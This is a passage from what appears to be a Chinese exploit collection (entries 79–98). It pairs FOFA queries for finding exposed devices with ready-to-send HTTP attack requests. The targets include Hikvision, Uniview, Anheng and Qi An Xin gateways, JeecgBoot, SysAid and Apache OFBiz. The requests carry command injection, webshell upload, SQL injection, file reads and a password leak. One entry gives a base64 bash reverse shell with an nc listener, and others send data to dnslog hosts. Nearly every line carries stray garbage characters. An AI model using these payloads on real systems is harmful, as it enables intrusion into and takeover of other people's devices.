9 L3 V. g. Q! o* D% Z4 `GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1! z# n5 I8 V2 X! L$ f2 k
Host: x.x.x.x+ k; J/ L7 Q) r& B
4 M4 H) @& V5 C3 F0 U6 s1 b! x) V2 }, H6 ~0 i4 D) M
79. BYTEVALUE 百为流控路由器远程命令执行5 }5 K) K9 |- {" X5 o9 ]
FOFA:BYTEVALUE 智能流控路由器% R5 q& t3 c/ b$ Z4 t: n
GET /goform/webRead/open/?path=|id HTTP/1.1- M# n/ O( x. e4 C2 E
Host:IP4 d' w6 e' I H6 k/ h/ j& f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
; {' C" i c$ z0 ?( N" pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 i0 @0 H6 t+ w( PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* C! r1 k G3 {! h7 ~7 [Accept-Encoding: gzip, deflate
( U* x/ d, X. ]! y# O9 qConnection: close
( O7 c. D6 {' l: R( o UUpgrade-Insecure-Requests: 16 y7 d6 b8 U, u" J& k) j* X
, [2 \) l/ H; V+ N, s
' } G1 s$ B& x4 N( b7 @80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传2 R, C, ^% w9 C$ [
FOFA:app="速达软件-公司产品"
# I, b; j3 }5 F& b9 b4 O, zPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1' J1 d7 c6 Z x5 v9 U
Host: x.x.x.x+ f1 o! ~6 K F' ]0 I" b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 }/ Z# ~- h" ~6 S" k
Content-Length: 27
% d( z% ?5 J2 ~* IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# Z9 u; Q% o1 {* d0 a6 I
Accept-Encoding: gzip, deflate
7 C9 S' I3 r' }$ P* U! JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) W1 G, h! q; ^) sConnection: close$ y+ E1 D$ n9 X( r- p2 N. H
Content-Type: application/octet-stream* q! d' `; b: M! ]# u4 e
Upgrade-Insecure-Requests: 1
8 l8 _% M7 @% s* Z
2 c4 u! ^$ [' k" Y5 Y* Q<% out.print("oessqeonylzaf");%>
2 E; m: l+ `* f8 x3 D& x7 d7 o) f
* z8 d* l$ _2 o% P0 E# n4 E) \3 e
% g+ A5 B" V/ U" o# z+ T4 ZGET /xykqmfxpoas.jsp HTTP/1.1
& a% ?- `9 @8 @; x" k0 C* OHost: x.x.x.x
) s5 Z, q* I( {8 J( f* O) ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 k# V2 M* W6 I& a) XConnection: close/ I" q1 m3 g5 ^1 ?6 a( y
Accept-Encoding: gzip
- j5 Q; L' J+ N5 n
( E+ n1 q; U0 b% S; O
$ x) V. \6 a# W) c# p* i, J81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露1 D x/ \ T8 [5 f; y/ r
FOFA:app="uniview-视频监控"( `% K7 z \$ N3 l/ X2 C1 C
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1/ X q# @+ S3 F( H% \. v! N
Host: x.x.x.x; u& U M4 W k% z _0 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# ]& j5 E& t" }
Connection: close
- f2 ~2 f4 T( G. D: s' mAccept-Encoding: gzip
" N+ W9 m/ m1 d# [( ?) }; T5 `) j2 s1 V/ j" G1 M7 Z% B" b3 U( h
1 c. h' Y# ?5 y/ N82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
% a+ N; Z9 C9 gFOFA:app="思福迪-LOGBASE"
2 z& w; Z { ?& V9 SPOST /bhost/test_qrcode_b HTTP/1.1
* F8 Q: ^ l# R D7 CHost: BaseURL. w) i4 v* F! F7 K( D' y0 E
User-Agent: Go-http-client/1.1( D# a* I5 _4 {+ i8 T% X8 l
Content-Length: 23
( o: ]* L" u2 T& C' UAccept-Encoding: gzip, @4 v* @! G* T
Connection: close
$ R2 L: G6 |' o2 ]& Y# j) cContent-Type: application/x-www-form-urlencoded
0 R( m1 N M# a6 SReferer: BaseURL1 r6 Y+ ~ h/ B
, \+ t$ _( l* g7 r0 J' H/ Dz1=1&z2="|id;"&z3=bhost, _; c) a2 [, b# d/ ] q+ A
! g& V" m" d. Z: x' m4 R
# x$ ~6 y/ D* A3 i8 `4 W83. JeecgBoot testConnection 远程命令执行
4 g! b8 x" W" d' X4 s3 wFOFA:title=="JeecgBoot 企业级低代码平台"
) l9 n. Q0 T3 s6 ]3 J4 w0 L$ o# `! i
; y9 [$ U4 e/ l
+ ?2 F" ]8 u' e0 TPOST /jmreport/testConnection HTTP/1.1
; V0 S8 l/ H# |) B! XHost: x.x.x.x
- g3 o0 @0 D" J2 I5 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. t* F. L1 E& q1 uConnection: close
. {1 {- ]( j6 K: K. cContent-Length: 8881' ~ s, Z3 {. |7 \
Accept-Encoding: gzip
. _* X5 |% T- Q0 K e/ oCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"1 n& H+ U/ ^! p {0 @' e5 N* z6 L
Content-Type: application/json, b* a- s* t7 F; z
$ k9 Z- G, D9 P" e. A8 IPAYLOAD) w! j6 k7 e% H# f( V
% z! o, [/ \% U, V5 T5 z* f2 b: A84. Jeecg-Boot JimuReport queryFieldBySql 模板注入' X" s/ M- ~( C: V
FOFA:title=="JeecgBoot 企业级低代码平台") A& D* Q8 p% D4 [2 y
% E* t( T+ R$ R* W9 r$ \
" h: ?( j7 @9 M8 h3 {" g* a
1 h0 o& O; x; N) l6 Z! z8 O9 Z5 w: QPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
" Z" S5 l; h: \. w+ xHost: 192.168.40.130:8080, |& i6 i" ^0 p7 ^
User-Agent: curl/7.88.1
, g( A9 z* c% ^% l* XContent-Length: 156
a2 [$ E& _& }$ yAccept: */*
' z; K9 f( w3 rConnection: close
& [/ K0 S% A! L' u0 [0 v2 }9 OContent-Type: application/json$ e* y; O5 G( I2 L% @% I1 L* f
Accept-Encoding: gzip$ O3 q& ]. y0 M1 @" g' L
0 Z w3 g* a+ r" T5 [
{" i1 \' F# E' o
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",, x' J' B- _7 I4 j# f% P# H
"type": "0"/ T- p1 c6 w2 t' |; W1 p0 k( }
}
% o* _. s# \) b1 I: n n! o& F
0 d4 s& T/ |/ a' Z5 Y; [* z% Y0 `# v4 e/ O: Z3 q4 N
85. SysAid On-premise< 23.3.36远程代码执行3 g! k* c, k5 j+ P) x
CVE-2023-47246
5 j. V x- L# R3 ]0 Z" ~% z3 {FOFA:body="sysaid-logo-dark-green.png" $ j& t8 R" u- f8 Y$ |" L H% _
EXP数据包如下,注入哥斯拉马
- ?4 O7 ]0 j: l; Z" Y# {POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1$ Y, g! n* w Q" _* j& v( s8 R
Host: x.x.x.x
3 c! y8 s: M2 w0 X S w; q5 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% K6 @/ a9 R* t' l( A) A7 ^/ oContent-Type: application/octet-stream
4 X( l# ~9 @' d- V/ D+ B& \: q# SAccept-Encoding: gzip9 i$ ^$ ~' z# }2 ]' T- N
$ z- N$ H: w* ^. ^
PAYLOAD$ V# l+ i* h7 {. {$ a
6 c" N, [- ?" e- z; r2 G回显URL:http://x.x.x.x/userfiles/index.jsp
) r, }$ ~6 `+ x! ^: I4 F7 C' a* R
6 |$ o) I+ `; ~0 a" }3 |86. 日本tosei自助洗衣机RCE
. D1 d+ B7 J" Z& |2 p DFOFA:body="tosei_login_check.php"* x6 s2 ?8 r9 m# q# `3 |
POST /cgi-bin/network_test.php HTTP/1.1% t% M4 Q b2 @- C; R D" u
Host: x.x.x.x
c) r% I9 t& ]$ eUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.369 E; s/ C! Y5 M0 E ]/ o/ V& c9 z
Connection: close2 n$ x* `: e: }% v1 r1 |( R5 N% q7 M& {
Content-Length: 44. t( I* }( W, ?2 Q# I( q% g3 s7 t
Accept: */*' s) D, M& o8 }# M
Accept-Encoding: gzip
! a$ {: O) X# [7 _% BAccept-Language: en& X( J( |. r5 e( g: [! i
Content-Type: application/x-www-form-urlencoded; ~! `3 x5 A# f5 J! p g4 q
6 u% {2 K) d) _1 H4 E% o C
host=%0acat${IFS}/etc/passwd%0a&command=ping* `; |) i5 o3 c& w0 e5 S" d
* |" N# D' w) q+ L
+ m1 Z4 B% i ^1 \. [7 ~87. 安恒明御安全网关aaa_local_web_preview文件上传
4 W( B9 j8 x# u* X' nFOFA:title="明御安全网关"& a) R, I1 I5 ~
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
; U& P7 O+ u4 c1 vHost: X.X.X.X
* m4 l0 g" c' r6 g. c+ S# c& qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: ?+ G% n2 p% E7 ~) [" [/ U6 k
Connection: close. U6 t, D k2 k o
Content-Length: 198
" h& p1 X# @% o. S/ d C9 sAccept-Encoding: gzip f3 ?; M" Q. F' |
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd0 ^0 S" j, M$ ?5 a4 L H
: t |+ Q q2 V" I--qqobiandqgawlxodfiisporjwravxtvd! a9 ?3 |- H) K+ B" g
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"4 p4 L( n( X& v9 Y6 m
Content-Type: text/plain4 N7 i* ?" m) h" o8 ~0 }. O
& X, R* L# Y$ U' h6 r0 A( N7 r% k! W" }2ZqGNnsjzzU2GBBPyd8AIA7QlDq' ? m" e G) k# ^6 `2 p/ I. f0 H
--qqobiandqgawlxodfiisporjwravxtvd--
0 i! s6 O* \: r! o* z: w' l' _2 o2 S$ l4 q3 h
' H: {* D+ ?+ O Y+ c! ~3 Y: }/jfhatuwe.php
; o& {6 T+ b7 k
/ W- J. K# V7 M# M" m7 ^88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行5 a* T3 X- A& a
FOFA:title="明御安全网关"
/ ]/ z8 M2 Z, P6 S1 ~7 m! N4 {GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
7 }) f" ^8 m) R* y: X2 ?, kHost: x.x.x.xx.x.x.x
* j/ R% L8 e' SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 l1 K j6 r3 @0 F" ?$ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 }0 ~3 u, D- h; _. x m* Q0 iAccept-Encoding: gzip, deflate
! f# \$ z! G6 }: P0 W% nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* h, n' h5 T. @# g
Connection: close- X, H( O6 |- a6 t6 ?. ^
`) u' D) h9 B; {$ M1 _* t& a9 G5 m7 a7 Y# L" P
/astdfkhl.php7 h* l l( [- T3 E3 Y* Y
+ D% I3 U7 ^) Q; E0 U1 o4 U b
89. 致远互联FE协作办公平台editflow_manager存在sql注入" c+ g! ~) U% ]! W1 L; | ]
FOFA:title="FE协作办公平台" || body="li_plugins_download"' L- W* f* {9 b5 t6 v; z0 h* J9 i
POST /sysform/003/editflow_manager.js%70 HTTP/1.1; r1 s u% I3 k$ r0 ^
Host: x.x.x.x
/ A! J |# D6 c1 `( W5 q* DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* f w0 c F, o' n8 DConnection: close
) H) k9 w/ v5 l0 EContent-Length: 41
; G6 s% T2 g; _' x1 D0 X* J' C5 ZContent-Type: application/x-www-form-urlencoded
# c( }% L3 Q" e4 k; `8 F+ KAccept-Encoding: gzip
+ H7 H' R4 B) H' K) @: y$ ^
: ?$ K* N+ W3 b% H% coption=2&GUID=-1'+union+select+111*222--+$ ^( D' t& M+ P; d# l9 a6 V
+ B, l4 i' N8 q/ K7 O+ S
" t7 B8 p0 C+ i' X; C ]90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
1 f* q N8 w) t( m* xFOFA:icon_hash="-1830859634"
, Y5 N6 `" y2 p5 ^POST /php/ping.php HTTP/1.1
/ ], w2 ~5 v$ P- o$ `& I2 NHost: x.x.x.x
6 l' k( E& e3 B' y% B5 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0$ Z- Q' Z* E5 e# m. W+ s
Content-Length: 51
; n" ]4 R0 G& e! ]4 n) _7 tAccept: application/json, text/javascript, */*; q=0.01
8 b p" S( H IAccept-Encoding: gzip, deflate1 w7 u0 Y6 ^+ f. L. Q" B) d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 J7 r7 E4 B5 ~/ m3 D3 UConnection: close
9 `) l9 O, k5 w- j5 ]$ v$ ]# bContent-Type: application/x-www-form-urlencoded2 C3 r# U' a5 U& n( ` z
X-Requested-With: XMLHttpRequest
6 z4 Y3 z4 ]* H: h0 ?; i# V' S' x
# i8 D7 ~+ v" c3 Ijsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig z7 P! Q% U3 h C' n, f
d5 y4 t+ F& C) b& r9 f6 w; v, m4 Z5 J; D' G8 W# e
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取% y6 G' ~. M" Y! w
FOFA:title="综合安防管理平台"$ q8 ]* V1 f. q8 v) U$ L) M: J g
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1* H" j: R5 d* f5 K
Host: your-ip$ |2 I$ h$ g3 F1 [9 X! ^" h7 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36# ?7 j% K3 O/ {6 H9 _
Accept-Encoding: gzip, deflate
. m* c% p1 _: I: T5 uAccept: */*
1 P* S+ d8 Z+ m: @% `* \. z G1 WConnection: keep-alive8 U) k- [: o( [# C
' @4 z9 o7 r* D/ r9 E+ W5 m% `* f; O+ U
& R6 G0 y0 W* [7 u7 z- P5 w
92. 海康威视运行管理中心session命令执行& Q/ g" I0 \ y
Fastjson命令执行
: B- m- z: X0 ?+ n) B7 Lhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"8 ^1 l! g p& J4 |4 P+ u/ n
POST /center/api/session HTTP/1.1
# B! w2 ~, C% S/ H) P9 O, cHost:
5 F# O2 B/ r# v p0 U1 UAccept: application/json, text/plain, */*
0 {; |. Z0 K9 _/ HAccept-Encoding: gzip, deflate
3 P, G. q) J+ o# R2 YX-Requested-With: XMLHttpRequest
0 I2 z) d7 W4 R2 p2 N3 _2 `6 Z& j9 pContent-Type: application/json;charset=UTF-86 p/ g a) v. M# Z8 [* s$ F; W; _9 z {
X-Language-Type: zh_CN* s- @: }9 m+ R) V( M- p) `" Y
Testcmd: echo test
: A9 i: j9 m/ t. z% AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36, @/ f* M) D9 \- r
Accept-Language: zh-CN,zh;q=0.98 q$ e1 H2 \' R' k4 x# h9 s
Content-Length: 5778
- S& @/ D" V! \6 z0 I) c. {: h6 |- i) y
PAYLOAD8 j. P4 o! J! o0 N) w' R
+ A& J/ M) X9 E2 @) {
; T. O0 i# w: Q9 U8 x7 u& f93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传/ p0 P! F/ \6 J% y2 ~- m* J* n
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="% j3 r* _$ {' p4 d
POST /?g=app_av_import_save HTTP/1.1& U$ q7 B1 s! G |: e/ b0 q
Host: x.x.x.x% f5 Z5 t3 S" m; I* z6 x* b% _( [5 f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx9 a" x2 l) Z$ ]# R" l4 X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 Z7 ^" m* d) ~& o, Q
, T {9 p. ]3 o# G8 C: _
------WebKitFormBoundarykcbkgdfx
4 Y) f5 m0 c, sContent-Disposition: form-data; name="MAX_FILE_SIZE"
8 G ^- f- f# S5 W! K* |, e8 \$ w( s; Q6 ^5 s" Y4 A
10000000
6 J7 ^# |( i. p------WebKitFormBoundarykcbkgdfx
7 `6 }, | y8 J9 Y6 |9 j# XContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
/ [7 Q' y* Q5 a! ?Content-Type: text/plain
( N# m! I2 Y, L5 W5 ^; g- X* D9 e+ c$ n$ q. C/ s2 B% o! M$ G
wagletqrkwrddkthtulxsqrphulnknxa
+ H/ p2 \) d* g# T. _------WebKitFormBoundarykcbkgdfx i0 f8 S! {; S! F% s5 z
Content-Disposition: form-data; name="submit_post"( X" w% i0 n; S) {/ D# |! O4 u. z
. N- w% F! y# k; ]* r# ]3 h
obj_app_upfile$ b) [ y" i S4 f0 H1 b" Y3 Y% K
------WebKitFormBoundarykcbkgdfx
3 N& |# T" ~, p* X8 o* o$ LContent-Disposition: form-data; name="__hash__"
% g2 `/ L) l7 ~7 q" c G9 W
( ^, y4 j& ]$ n9 [) P- X* O; U0b9d6b1ab7479ab69d9f71b05e0e9445
, b8 [/ e; F# t8 w; q6 T8 g------WebKitFormBoundarykcbkgdfx--
8 D; Y; |6 `4 w: x0 ]: I# C
- N* ~! Y2 G) y7 v
, h6 q# y: k s6 W/ QGET /attachements/xlskxknxa.txt HTTP/1.1
% X. F% \. Y. I" K. VHost: xx.xx.xx.xx$ M' Z: \! _1 \( [5 R+ E2 O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 n, m$ [1 Q/ f) a5 N; L
$ _' C% x# X2 w7 ]7 @. k2 D7 o9 m0 b9 X1 h9 P9 o
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传0 _. a- j0 [+ w0 Q5 C2 I$ r- R# X
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
, c O7 p/ M1 d$ UPOST /?g=obj_area_import_save HTTP/1.1
, t1 Z( ]+ }! vHost: x.x.x.x5 Y ]& M) Z# | G+ } s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt2 k* `& p9 s: q8 y# g0 K0 O3 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# l M, G c4 z0 b) e1 s
* x+ C: B+ y) `. |4 V------WebKitFormBoundarybqvzqvmt
* B$ E" M6 G/ N% e3 bContent-Disposition: form-data; name="MAX_FILE_SIZE"7 `! W4 j( ?" q5 s8 N n) `# p
- q0 Z/ U# N( \6 V10000000/ e+ j, S6 G( X; n, n+ E7 N+ _6 M
------WebKitFormBoundarybqvzqvmt6 H* ~4 _# |* _! z/ w& W1 e# A
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
, @5 [' ? N2 r% z i, p3 pContent-Type: text/plain0 {) A1 B( j O2 o; {: E+ L
: r' c* i7 ^2 w
pxplitttsrjnyoafavcajwkvhxindhmu$ v; B2 x- f: {
------WebKitFormBoundarybqvzqvmt$ {! D' j) K2 X0 c* d
Content-Disposition: form-data; name="submit_post"
0 t5 a) K) g0 A3 }$ d+ [' U3 [5 M" x- S! C) X' n! U
obj_app_upfile. m' t2 ^; U/ s4 g0 B r
------WebKitFormBoundarybqvzqvmt: f j) G; e) [/ {! T7 I& _5 a3 w
Content-Disposition: form-data; name="__hash__". R1 [) d' P2 Y, B3 ?1 G4 t/ x6 b/ M
: X; s0 Y* Y- L3 f% o/ s2 |
0b9d6b1ab7479ab69d9f71b05e0e9445
* |1 b# U' X0 q9 D& @------WebKitFormBoundarybqvzqvmt--
9 m% o, N: {. o. I- ^
3 b( @9 ]- G$ [2 ]8 W* `/ E" R
, q" m% A0 W( W' O. p% g) @& m1 @# O- F! V9 V
GET /attachements/xlskxknxa.txt HTTP/1.12 \1 K% k) [8 u0 {, w+ X/ K7 i
Host: xx.xx.xx.xx
2 G9 [# v/ M% H7 _User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ X5 z0 u8 i, B8 D9 F1 u
$ M3 A& e$ G$ F0 ^
' N4 U& F( u- U5 m3 d% G3 r' L) k2 _
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行1 o/ L. U1 w) m8 r# F: i" ^
CVE-2023-490708 c. m( X/ I+ ^% M
FOFA:app="Apache_OFBiz"
$ _( s5 z6 `, z2 EPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.17 B8 P$ ?, A5 [
Host: x.x.x.x7 a! C4 e- m; f1 U+ N$ |+ b. n, O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 l. A! o8 q0 F3 {7 Z7 @Connection: close
, v! A+ t9 Z1 i5 x) lContent-Length: 889
, v; X4 B/ X+ ]Content-Type: application/xml
8 ^. C; z# i$ EAccept-Encoding: gzip
& ?9 B; C- y+ `3 p4 j$ j7 c
1 S$ i6 I X$ q/ m<?xml version="1.0"?>
7 t: T5 ~+ p/ H/ p9 L; h' X<methodCall>: c3 F' w# L9 j% }
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>+ E- w7 _4 C+ D& s" r
<params>- Z5 E2 e3 u0 t& R( c7 X4 q: m0 A
<param>
" g4 \. H/ ~ n9 x4 u9 ~. R <value>- {& H. r- x% d: i
<struct>5 U% B9 C3 D! @9 A2 j0 ]# Z, k8 a
<member>
1 r$ S4 U, U" ~. a+ M- Q <name>test</name>& H4 B4 L9 ]/ ]* \' {# W+ |
<value>0 L) K1 S5 E# t- b6 ^, H! {) ~- c
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
9 y# A8 F% A, E8 `0 R& L* D0 }! h </value>
& a, P5 w7 z( i1 X1 r; @ </member>
; w+ S* S" q* n </struct>" z- B0 i9 U/ Z; Q9 t6 H
</value>
7 w( b: ?$ ^8 [8 |: I9 m4 o </param>
3 ^/ s* }& U6 @% _ </params>1 B+ E# S7 z7 U) w" b* P
</methodCall>" ]9 ^% J1 a1 N' Q. W
* P/ k4 }$ ?/ f/ h7 x1 v/ p n
7 W/ ^8 D7 t, P$ U" g% c! t& o; {
用ysoserial生成payload
) u0 ?* v& [" V" j6 T( {* qjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"+ f5 D2 ~5 v* M' \/ G9 j, u. e
$ N# V2 S* e# i; I
6 ~: T# I: m, |5 }
将生成的payload替换到上面的POC0 I! i$ d; j# Z& H- A
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
( b' c8 I' |: w! R" ?9 ZHost: 192.168.40.130:8443- W, Q5 |+ E. \: e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36: h" Q8 [* [& e; v& D K4 }/ T
Connection: close
$ ~9 g% f; N, Y( O W0 wContent-Length: 889
! F% b$ O2 L% i+ C% |/ z2 tContent-Type: application/xml+ s7 p8 ?# m; q5 S5 r2 M
Accept-Encoding: gzip8 H. J5 @! [0 y* ?* @8 k, [6 r
6 d7 s3 W5 ?7 k4 z6 @
PAYLOAD
' `% f [% Z* K" U' {$ I/ J1 q6 S' U* I6 h4 C7 B: ?
96. Apache OFBiz 18.12.11 groovy 远程代码执行' E+ a0 }( y! y* s, }3 w$ Z6 F. S$ F
FOFA:app="Apache_OFBiz"4 @9 t% D1 m0 L; H* g# ^/ C! }
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1' g5 W, Y7 k9 v* D. I3 E
Host: localhost:8443
/ s$ l/ [% N3 h( b/ j qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) y* H# c2 P8 [/ h( A" L! {1 |7 fAccept: */*
' L2 a( a* |7 M: eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 k1 A( V# u! d: m
Content-Type: application/x-www-form-urlencoded# V, p7 ` b- b& E
Content-Length: 55
( F) ^5 W9 Y5 l3 C! s3 j
* e6 `- u. g7 w9 U( d$ Z3 x8 c) KgroovyProgram=throw+new+Exception('id'.execute().text);
8 @' `3 k0 n& M" r) v& x
, `! t. D! E- s" R
( C5 D& \6 r, W2 W/ Y6 M5 o反弹shell
# ^) Y2 y. X. \9 Z' y9 M在kali上启动一个监听
: [; L& E5 W) Y* K$ z, Qnc -lvp 7777
3 r% W7 n( N. Y# N& z* W; ^; r3 d$ a% Y2 V+ ^
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
7 U, q* o! i" n5 K1 {" o" C, fHost: 192.168.40.130:84436 e% W. Z, u; i0 Y, K) }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% s6 @; T$ h, a! C+ ~Accept: */*8 z1 j9 h, u9 ]4 e8 ?) _$ ?, r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 u% k; k4 @" }% C& Y3 p3 o: @0 Z4 PContent-Type: application/x-www-form-urlencoded9 R* |* K! o! Z C! }: q
Content-Length: 71
0 n6 Q) Z, s4 T. d0 R
% G1 a8 D4 D9 J4 u9 K5 ^# O8 XgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();0 J' H; A, N/ u' d0 t7 S
3 o8 _3 w5 n6 c( ]97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
$ G/ v* T+ r3 R; wFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"7 a2 g- {/ z, e0 p7 [ @; J3 V1 j
GET /passport/login/ HTTP/1.1
1 \: h# w2 u3 gHost: 192.168.40.130:8085$ h k, U( D$ r3 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: F& \1 l8 I! L# Q& @% C$ j
Accept-Encoding: gzip
; G1 N7 B1 {: QConnection: close
4 q! v% b" c0 X: L! v# ?& m2 fCookie: rememberMe=PAYLOAD
' s5 M" Y+ E- \+ cX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"2 E# a/ P4 G. Y7 g/ Z3 O: Y
* |8 q$ l g# S: S
8 I- v* H: v1 r- B98. SpiderFlow爬虫平台远程命令执行6 c( r& u% f* Z" L( M" C, c
CVE-2024-0195
( b' E" p5 J: _( M% wFOFA:app="SpiderFlow"" v/ G, R% K7 c, k/ m6 o
POST /function/save HTTP/1.1
* A2 m, l& q' E# W1 Q) Y. @Host: 192.168.40.130:8088+ K2 l. m- Q/ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 ~! X" J6 ]( c/ c$ i
Connection: close
7 k, b1 Y/ e8 l7 w: JContent-Length: 121
